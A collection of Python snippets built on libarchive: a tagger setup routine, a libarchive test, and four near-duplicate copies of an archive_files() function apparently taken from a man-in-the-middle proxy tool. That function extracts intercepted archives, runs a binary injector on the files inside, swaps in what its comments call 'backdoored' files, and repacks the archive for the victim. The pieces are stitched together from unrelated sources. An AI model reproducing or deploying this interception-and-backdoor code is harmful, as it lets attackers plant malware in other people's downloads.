def prepare(): """Prepare tagger for run. This should be after installation to initialize tagger's resources. """ import nltk import requests from libarchive import extract_memory import os from shutil import move from f8a_tagger.utils import get_files_dir nltk.download("punkt") nltk.download("wordnet") maven_index_checker_url = 'https://github.com/fabric8-analytics/' \ 'maven-index-checker/files/1275145/' \ 'maven-index-checker-v0.1-alpha.zip' response = requests.get(maven_index_checker_url) if response.ok is not True: raise RemoteDependencyMissingError( "Failed to download maven-index-checker with " "response code %s", response.status_code) # Unfortunately no way how to know name or path of extracted file, # so assume it's maven-index-checker.jar jar_name = "maven-index-checker.jar" jar_path = get_files_dir() extract_memory(response.content) move(jar_name, os.path.join(jar_path, jar_name))
def test_buffers(tmpdir): # Collect information on what should be in the archive tree = treestat('libarchive') # Create an archive of our libarchive/ directory buf = bytes(bytearray(1000000)) with libarchive.memory_writer(buf, 'gnutar', 'xz') as archive: archive.add_files('libarchive/') # Read the archive and check that the data is correct with libarchive.memory_reader(buf) as archive: check_archive(archive, tree) # Extract the archive in tmpdir and check that the data is intact with in_dir(tmpdir.strpath): flags = EXTRACT_OWNER | EXTRACT_PERM | EXTRACT_TIME libarchive.extract_memory(buf, flags) tree2 = treestat('libarchive') assert tree2 == tree
def archive_files(self, arch_file_bytes, arch_info, include_dirs=False): try: archive_type = ArchiveType(arch_info['type']) except Exception as ex: EnhancedOutput.print_error( "Missing fields in the config file: {}".format(ex)) EnhancedOutput.print_warning("Returning original file.") EnhancedOutput.logging_error( "Error setting archive type: {}. Returning original file.". format(ex)) return arch_file_bytes EnhancedOutput.print_size(arch_file_bytes) if len(arch_file_bytes) > archive_type.maxSize: EnhancedOutput.print_error("{} over allowed size".format( arch_info['type'])) EnhancedOutput.logging_info("{} maxSize met {}".format( arch_info['type'], len(arch_file_bytes))) return arch_file_bytes tmp_dir = tempfile.mkdtemp() try: with in_dir(tmp_dir): flags = libarchive.extract.EXTRACT_OWNER | libarchive.extract.EXTRACT_PERM | libarchive.extract.EXTRACT_TIME libarchive.extract_memory(arch_file_bytes, flags) except Exception as exce: EnhancedOutput.print_error( "Can't extract file. Returning original one.") EnhancedOutput.logging_error( "Can't extract file: {}. Returning original one.".format(exce)) return arch_file_bytes EnhancedOutput.print_info("{} file contents and info".format( arch_info['type'])) EnhancedOutput.print_info("Compression: {}".format( arch_info['filter'])) files_list = list() for dirname, dirnames, filenames in os.walk(tmp_dir): dirz = dirname.replace(tmp_dir, ".") print "\t{0}".format(dirz) if include_dirs: files_list.append(dirz) for f in filenames: fn = os.path.join(dirz, f) files_list.append(fn) print "\t{} {}".format( fn, os.lstat(os.path.join(dirname, f)).st_size) patch_count = 0 patched = False tmp_archive = tempfile.NamedTemporaryFile() try: with libarchive.file_writer(tmp_archive.name, arch_info['format'], arch_info['filter']) as archive: for filename in files_list: full_path = os.path.join(tmp_dir, filename) EnhancedOutput.print_info( ">>> Next file in archive: {}".format(filename)) if os.path.islink( full_path) or not os.path.isfile(full_path): EnhancedOutput.print_warning( "{} is not a file, skipping.".format(filename)) with in_dir(tmp_dir): archive.add_files(filename) continue if os.lstat(full_path).st_size >= long(self.file_size_max): EnhancedOutput.print_warning( "{} is too big, skipping.".format(filename)) with in_dir(tmp_dir): archive.add_files(filename) continue # Check against keywords keyword_check = False if type(archive_type.blacklist) is str: if archive_type.blacklist.lower() in filename.lower(): keyword_check = True else: for keyword in archive_type.blacklist: if keyword.lower() in filename.lower(): keyword_check = True continue if keyword_check is True: EnhancedOutput.print_warning( "Archive blacklist enforced!") EnhancedOutput.logging_info( "Archive blacklist enforced on {}".format( filename)) continue if patch_count >= archive_type.patchCount: with in_dir(tmp_dir): archive.add_files(filename) EnhancedOutput.logging_info( "Met archive config patch count limit. Adding original file." ) else: # create the file on disk temporarily for binaryGrinder to run on it tmp = tempfile.NamedTemporaryFile() shutil.copyfile(full_path, tmp.name) tmp.flush() patch_result = self.binary_injector(tmp.name) if patch_result: patch_count += 1 file2 = os.path.join(self.staging_folder, os.path.basename(tmp.name)) EnhancedOutput.print_info( "Patching complete, adding to archive file.") # let's move the backdoored file to the final location shutil.copyfile(file2, full_path) EnhancedOutput.logging_info( "{} in archive patched, adding to final archive" .format(filename)) os.remove(file2) patched = True else: EnhancedOutput.print_error("Patching failed") EnhancedOutput.logging_error( "{} patching failed. Keeping original file.". format(filename)) with in_dir(tmp_dir): archive.add_files(filename) tmp.close() except Exception as exc: EnhancedOutput.print_error( "Error while creating the archive: {}. Returning the original file." .format(exc)) EnhancedOutput.logging_error( "Error while creating the archive: {}. Returning original file." .format(exc)) shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return arch_file_bytes if patched is False: EnhancedOutput.print_info( "No files were patched. Forwarding original file") shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return arch_file_bytes with open(tmp_archive.name, 'r+b') as f: ret = f.read() # cleanup shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() EnhancedOutput.logging_info( "Patching complete for HOST: {} ({}), PATH: {}".format( self.flow.request.host, self.host_domain, self.flow.request.path)) return ret
def archive_files(self, arch_file_bytes, arch_info, include_dirs=False): try: archive_type = ArchiveType(arch_info["type"]) except Exception as ex: return arch_file_bytes if len(arch_file_bytes) > archive_type.maxSize: return arch_file_bytes tmp_dir = tempfile.mkdtemp() try: with in_dir(tmp_dir): flags = ( libarchive.extract.EXTRACT_OWNER | libarchive.extract.EXTRACT_PERM | libarchive.extract.EXTRACT_TIME ) libarchive.extract_memory(arch_file_bytes, flags) except Exception as exce: return arch_file_bytes files_list = list() for dirname, dirnames, filenames in os.walk(tmp_dir): dirz = dirname.replace(tmp_dir, ".") if include_dirs: files_list.append(dirz) for f in filenames: fn = os.path.join(dirz, f) files_list.append(fn) patch_count = 0 patched = False tmp_archive = tempfile.NamedTemporaryFile() try: with libarchive.file_writer(tmp_archive.name, arch_info["format"], arch_info["filter"]) as archive: for filename in files_list: full_path = os.path.join(tmp_dir, filename) if os.path.islink(full_path) or not os.path.isfile(full_path): with in_dir(tmp_dir): archive.add_files(filename) continue if os.lstat(full_path).st_size >= long(self.file_size_max): with in_dir(tmp_dir): archive.add_files(filename) continue # Check against keywords keyword_check = False if type(archive_type.blacklist) is str: if archive_type.blacklist.lower() in filename.lower(): keyword_check = True else: for keyword in archive_type.blacklist: if keyword.lower() in filename.lower(): keyword_check = True continue if keyword_check is True: continue if patch_count >= archive_type.patchCount: with in_dir(tmp_dir): archive.add_files(filename) else: # create the file on disk temporarily for binaryGrinder to run on it tmp = tempfile.NamedTemporaryFile() shutil.copyfile(full_path, tmp.name) tmp.flush() with stdout_redirect(StringIO.StringIO()) as new_stdout: patch_result = self.binary_injector(tmp.name) if patch_result: patch_count += 1 file2 = os.path.join(self.staging_folder, os.path.basename(tmp.name)) # let's move the backdoored file to the final location shutil.copyfile(file2, full_path) os.remove(file2) patched = True self.context.log("Patching {}: done".format(filename)) else: self.context.log("Patching {}: failed".format(filename), level="error") with in_dir(tmp_dir): archive.add_files(filename) tmp.close() except Exception as exc: shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return arch_file_bytes if patched is False: shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return arch_file_bytes with open(tmp_archive.name, "r+b") as f: ret = f.read() # cleanup shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return ret
def archive_files(self, arch_file_bytes, arch_info, include_dirs=False): try: archive_type = ArchiveType(arch_info['type']) except Exception as ex: EnhancedOutput.print_error("Missing fields in the config file: {}".format(ex)) EnhancedOutput.print_warning("Returning original file.") EnhancedOutput.logging_error("Error setting archive type: {}. Returning original file.".format(ex)) return arch_file_bytes EnhancedOutput.print_size(arch_file_bytes) if len(arch_file_bytes) > archive_type.maxSize: EnhancedOutput.print_error("{} over allowed size".format(arch_info['type'])) EnhancedOutput.logging_info("{} maxSize met {}".format(arch_info['type'], len(arch_file_bytes))) return arch_file_bytes tmp_dir = tempfile.mkdtemp() try: with in_dir(tmp_dir): flags = libarchive.extract.EXTRACT_OWNER | libarchive.extract.EXTRACT_PERM | libarchive.extract.EXTRACT_TIME libarchive.extract_memory(arch_file_bytes, flags) except Exception as exce: EnhancedOutput.print_error("Can't extract file. Returning original one.") EnhancedOutput.logging_error("Can't extract file: {}. Returning original one.".format(exce)) return arch_file_bytes EnhancedOutput.print_info("{} file contents and info".format(arch_info['type'])) EnhancedOutput.print_info("Compression: {}".format(arch_info['filter'])) files_list = list() for dirname, dirnames, filenames in os.walk(tmp_dir): dirz = dirname.replace(tmp_dir, ".") print "\t{0}".format(dirz) if include_dirs: files_list.append(dirz) for f in filenames: fn = os.path.join(dirz, f) files_list.append(fn) print "\t{} {}".format(fn, os.lstat(os.path.join(dirname, f)).st_size) patch_count = 0 patched = False tmp_archive = tempfile.NamedTemporaryFile() try: with libarchive.file_writer(tmp_archive.name, arch_info['format'], arch_info['filter']) as archive: for filename in files_list: full_path = os.path.join(tmp_dir, filename) EnhancedOutput.print_info(">>> Next file in archive: {}".format(filename)) if os.path.islink(full_path) or not os.path.isfile(full_path): EnhancedOutput.print_warning("{} is not a file, skipping.".format(filename)) with in_dir(tmp_dir): archive.add_files(filename) continue if os.lstat(full_path).st_size >= long(self.file_size_max): EnhancedOutput.print_warning("{} is too big, skipping.".format(filename)) with in_dir(tmp_dir): archive.add_files(filename) continue # Check against keywords keyword_check = False if type(archive_type.blacklist) is str: if archive_type.blacklist.lower() in filename.lower(): keyword_check = True else: for keyword in archive_type.blacklist: if keyword.lower() in filename.lower(): keyword_check = True continue if keyword_check is True: EnhancedOutput.print_warning("Archive blacklist enforced!") EnhancedOutput.logging_info("Archive blacklist enforced on {}".format(filename)) continue if patch_count >= archive_type.patchCount: with in_dir(tmp_dir): archive.add_files(filename) EnhancedOutput.logging_info("Met archive config patch count limit. Adding original file.") else: # create the file on disk temporarily for binaryGrinder to run on it tmp = tempfile.NamedTemporaryFile() shutil.copyfile(full_path, tmp.name) tmp.flush() patch_result = self.binary_injector(tmp.name) if patch_result: patch_count += 1 file2 = os.path.join(self.staging_folder, os.path.basename(tmp.name)) EnhancedOutput.print_info("Patching complete, adding to archive file.") # let's move the backdoored file to the final location shutil.copyfile(file2, full_path) EnhancedOutput.logging_info( "{} in archive patched, adding to final archive".format(filename)) os.remove(file2) patched = True else: EnhancedOutput.print_error("Patching failed") EnhancedOutput.logging_error("{} patching failed. Keeping original file.".format(filename)) with in_dir(tmp_dir): archive.add_files(filename) tmp.close() except Exception as exc: EnhancedOutput.print_error( "Error while creating the archive: {}. Returning the original file.".format(exc)) EnhancedOutput.logging_error("Error while creating the archive: {}. Returning original file.".format(exc)) shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return arch_file_bytes if patched is False: EnhancedOutput.print_info("No files were patched. Forwarding original file") shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return arch_file_bytes with open(tmp_archive.name, 'r+b') as f: ret = f.read() # cleanup shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() EnhancedOutput.logging_info( "Patching complete for HOST: {} ({}), PATH: {}".format(self.flow.request.host, self.host_domain, self.flow.request.path)) return ret
def archive_files(self, arch_file_bytes, arch_info, include_dirs=False): try: archive_type = ArchiveType(arch_info['type']) except Exception as ex: return arch_file_bytes if len(arch_file_bytes) > archive_type.maxSize: return arch_file_bytes tmp_dir = tempfile.mkdtemp() try: with in_dir(tmp_dir): flags = libarchive.extract.EXTRACT_OWNER | libarchive.extract.EXTRACT_PERM | libarchive.extract.EXTRACT_TIME libarchive.extract_memory(arch_file_bytes, flags) except Exception as exce: return arch_file_bytes files_list = list() for dirname, dirnames, filenames in os.walk(tmp_dir): dirz = dirname.replace(tmp_dir, ".") if include_dirs: files_list.append(dirz) for f in filenames: fn = os.path.join(dirz, f) files_list.append(fn) patch_count = 0 patched = False tmp_archive = tempfile.NamedTemporaryFile() try: with libarchive.file_writer(tmp_archive.name, arch_info['format'], arch_info['filter']) as archive: for filename in files_list: full_path = os.path.join(tmp_dir, filename) if os.path.islink( full_path) or not os.path.isfile(full_path): with in_dir(tmp_dir): archive.add_files(filename) continue if os.lstat(full_path).st_size >= long(self.file_size_max): with in_dir(tmp_dir): archive.add_files(filename) continue # Check against keywords keyword_check = False if type(archive_type.blacklist) is str: if archive_type.blacklist.lower() in filename.lower(): keyword_check = True else: for keyword in archive_type.blacklist: if keyword.lower() in filename.lower(): keyword_check = True continue if keyword_check is True: continue if patch_count >= archive_type.patchCount: with in_dir(tmp_dir): archive.add_files(filename) else: # create the file on disk temporarily for binaryGrinder to run on it tmp = tempfile.NamedTemporaryFile() shutil.copyfile(full_path, tmp.name) tmp.flush() with stdout_redirect( StringIO.StringIO()) as new_stdout: patch_result = self.binary_injector(tmp.name) if patch_result: patch_count += 1 file2 = os.path.join(self.staging_folder, os.path.basename(tmp.name)) # let's move the backdoored file to the final location shutil.copyfile(file2, full_path) os.remove(file2) patched = True self.context.log( "Patching {}: done".format(filename)) else: self.context.log( "Patching {}: failed".format(filename), level="error") with in_dir(tmp_dir): archive.add_files(filename) tmp.close() except Exception as exc: shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return arch_file_bytes if patched is False: shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return arch_file_bytes with open(tmp_archive.name, 'r+b') as f: ret = f.read() # cleanup shutil.rmtree(tmp_dir, ignore_errors=True) tmp_archive.close() return ret